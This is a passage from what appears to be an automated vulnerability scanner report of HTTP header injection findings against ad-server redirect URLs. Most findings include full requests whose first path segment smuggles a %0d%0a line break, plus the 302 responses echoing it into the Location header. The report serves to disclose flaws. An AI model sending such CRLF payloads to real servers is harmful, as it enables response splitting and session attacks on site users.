GET /221b4%0d%0a11c7772ac93/bzo.361/L2_4985265;net=bzo;u=,bzo-84449761_1290467748,11bbcecf1d09b9d,none,;;sz=728x90;click=http://ib.adnxs.com/click/yDzyBwNP9z9O0CaHT_r0PwAAAGBmZv4_mpmZuUfhFEAAAABAMzMXQEeCYgow0o1P20-els-vlAih-epMAAAAAK7tAADLAQAA6AAAAAIAAADa3gEAAQAAAFVTRABVU0QA2AJaAKAGiQM-CQEBBQIEAAAAAAAsI5tO/cnd=!fCj6Bwj-6gEQ2r0HGIECIMsBKIkHMTMzMzMzMxdAQhMIABAAGAAgASj-__________8BQhQIvzoQABgAIAMo_v__________AUIUCL86EAAYACACKP7__________wFIAFAAWKAN/referrer=http%3A%2F%2Fwww.smh.com.au/clickenc=;net=bzo;env=ifr;ord1=93413;contx=none;dc=w;btg=;ord=1290467745? HTTP/1.1
Host: vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=yDzyBwNP9z9O0CaHT_r0PwAAAGBmZv4_mpmZuUfhFEAAAABAMzMXQEeCYgow0o1P20-els-vlAih-epMAAAAAK7tAADLAQAA6AAAAAIAAADa3gEAAQAAAFVTRABVU0QA2AJaAKAGiQM-CQECBQIEAAAAAAAtI6hO&tt_code=vert-15&udj=uf%28%27a%27%2C+1749%2C+1290467745%29%3Buf%28%27c%27%2C+30078%2C+1290467745%29%3Buf%28%27r%27%2C+122586%2C+1290467745%29%3Bppv%287487%2C+%275732469004487000647%27%2C+1290467745%2C+1290554145%2C+30078%2C+203%29%3B&cnd=!fCj6Bwj-6gEQ2r0HGIECIMsBKIkHMTMzMzMzMxdAQhMIABAAGAAgASj-__________8BQhQIvzoQABgAIAMo_v__________AUIUCL86EAAYACACKP7__________wFIAFAAWKAN&referrer=http://www.smh.com.au
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/221b4
11c7772ac93/bzo.361/L2_4985265;net=bzo;u=,bzo-84449761_1290467748,11bbcecf1d09b9d,none,;;sz=728x90;click=http: //ib.adnxs.com/click/yDzyBwNP9z9O0CaHT_r0PwAAAGBmZv4_mpmZuUfhFEAAAABAMzMXQEeCYgow0o1P20-els-vlAih-epMAAAAAK7tAADLAQAA6AAAAAIAAADa3gEAAQAAAFVTRABVU0QA2AJaAKAGiQM-CQEBBQIEAAAAAAAsI5tO/
Date: Mon, 22 Nov 2010 23:17:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/click%3Bh%3Dv8/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 946c0%0d%0a9ed7dfaaf7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /946c0%0d%0a9ed7dfaaf7/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html?cid=BAC-bsrsch HTTP/1.1
Host: vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2577439/300x250_VERTICALS_SOL3.swf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/946c0
9ed7dfaaf7/3a5a/3/0/*/d;230898127;0-0;0;55171727;4307-300/250;38800664/38818421/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Esscs%3D:
Date: Mon, 22 Nov 2010 23:18:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/click%3Bh%3Dv8/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ff04%0d%0ac914ed74c29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ff04%0d%0ac914ed74c29/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7ff04
c914ed74c29/3a5a/3/0/*/d;230898127;0-0;0;55171727;4307-300/250;38800664/38818421/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_a:
Date: Tue, 23 Nov 2010 00:05:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/click%3Bh%3Dv8/3a5a/3/0/%2a/l%3B230898125%3B0-0%3B0%3B55171727%3B3454-728/90%3B38800869/38818626/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 54417%0d%0a2a8a935d3a5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /54417%0d%0a2a8a935d3a5/3a5a/3/0/%2a/l%3B230898125%3B0-0%3B0%3B55171727%3B3454-728/90%3B38800869/38818626/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/54417
2a8a935d3a5/3a5a/3/0/*/l;230898125;0-0;0;55171727;3454-728/90;38800869/38818626/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Esscs%3D:
Date: Tue, 23 Nov 2010 00:05:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/click%3Bh%3Dv8/3a5a/7/138/%2a/f%3B230818547%3B0-0%3B0%3B53300639%3B4307-300/250%3B38772095/38789852/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~okv%3D%3Bpc%3DDFP230898127%3B%3B~sscs%3D%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ffa1%0d%0ab92cf083916 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ffa1%0d%0ab92cf083916/3a5a/7/138/%2a/f%3B230818547%3B0-0%3B0%3B53300639%3B4307-300/250%3B38772095/38789852/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~okv%3D%3Bpc%3DDFP230898127%3B%3B~sscs%3D%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html?cid=BAC-bsrsch HTTP/1.1
Host: vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2577439/300x250_VERTICALS_SOL3.swf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7ffa1
b92cf083916/3a5a/7/138/*/f;230818547;0-0;0;53300639;4307-300/250;38772095/38789852/1%3Bu%3D%2Cbzo-34303689_1290467750%2C11bbcecf1d09b9d%2Cnone%2Cbzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bpc%3DDFP230898127%3B%3B%7Esscs%3D:
Date: Mon, 22 Nov 2010 23:18:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/click%3Bh%3Dv8/3a5a/7/15f/%2a/d%3B230819914%3B0-0%3B0%3B53300633%3B3454-728/90%3B38772220/38789977/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~okv%3D%3Bpc%3DDFP230898125%3B%3B~sscs%3D%3fhttp://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/3/0/%2a/l%3B230898125%3B0-0%3B0%3B55171727%3B3454-728/90%3B38800869/38818626/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58933%0d%0af4361e0fd4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58933%0d%0af4361e0fd4/3a5a/7/15f/%2a/d%3B230819914%3B0-0%3B0%3B53300633%3B3454-728/90%3B38772220/38789977/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~okv%3D%3Bpc%3DDFP230898125%3B%3B~sscs%3D%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a5a/3/0/%2a/l%3B230898125%3B0-0%3B0%3B55171727%3B3454-728/90%3B38800869/38818626/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/58933
f4361e0fd4/3a5a/7/15f/*/d;230819914;0-0;0;53300633;3454-728/90;38772220/38789977/1%3Bu%3D%2Cbzo-71607044_1290469803%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bpc:
Date: Tue, 23 Nov 2010 00:05:20 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/click%3Bh%3Dv8/3a5a/7/195/%2a/f%3B230818547%3B0-0%3B0%3B53300639%3B4307-300/250%3B38772095/38789852/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~okv%3D%3Bpc%3DDFP230898127%3B%3B~sscs%3D%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 81adc%0d%0a7533d0e3ab9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /81adc%0d%0a7533d0e3ab9/3a5a/7/195/%2a/f%3B230818547%3B0-0%3B0%3B53300639%3B4307-300/250%3B38772095/38789852/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~okv%3D%3Bpc%3DDFP230898127%3B%3B~sscs%3D%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a5a/3/0/%2a/d%3B230898127%3B0-0%3B0%3B55171727%3B4307-300/250%3B38800664/38818421/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B~sscs%3D%3fhttp://b2b.vzw.com/industrysolutions/professionalservices.html HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/81adc
7533d0e3ab9/3a5a/7/195/*/f;230818547;0-0;0;53300639;4307-300/250;38772095/38789852/1%3Bu%3D%2Cbzo-82858510_1290469871%2C11bbcecf1d09b9d%2Centertainment%2Cbzo.automotive_l-bzo.politics_l-bzo.finance_m-bzo.real_estate_l-bzo.entertainment_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm:
Date: Tue, 23 Nov 2010 00:05:20 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.40. http://vulnerable.ad.partner/jump/N2998.bizo.comOX15981/B4855853.26 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/jump/N2998.bizo.comOX15981/B4855853.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 68d1d%0d%0ad29ec572f9c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /68d1d%0d%0ad29ec572f9c/N2998.bizo.comOX15981/B4855853.26 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/68d1d
d29ec572f9c/N2998.bizo.comOX15981/B4855853.26:
Date: Mon, 22 Nov 2010 23:35:53 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.41. http://vulnerable.ad.partner/jump/N2998.bizo.comOX15981/B4855853.28 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/jump/N2998.bizo.comOX15981/B4855853.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 10d0c%0d%0ad056e819a6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /10d0c%0d%0ad056e819a6f/N2998.bizo.comOX15981/B4855853.28 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/10d0c
d056e819a6f/N2998.bizo.comOX15981/B4855853.28:
Date: Mon, 22 Nov 2010 23:35:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.42. http://vulnerable.ad.partner/jump/N4441.247realmedia.com/B4724284.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/jump/N4441.247realmedia.com/B4724284.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8018f%0d%0ac13c2549373 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8018f%0d%0ac13c2549373/N4441.247realmedia.com/B4724284.4 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8018f
c13c2549373/N4441.247realmedia.com/B4724284.4:
Date: Tue, 23 Nov 2010 00:05:04 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.43. http://vulnerable.ad.partner/jump/N5687.135388.BIZO/B4978163.5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/jump/N5687.135388.BIZO/B4978163.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a5bc%0d%0addcf24c3ec4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

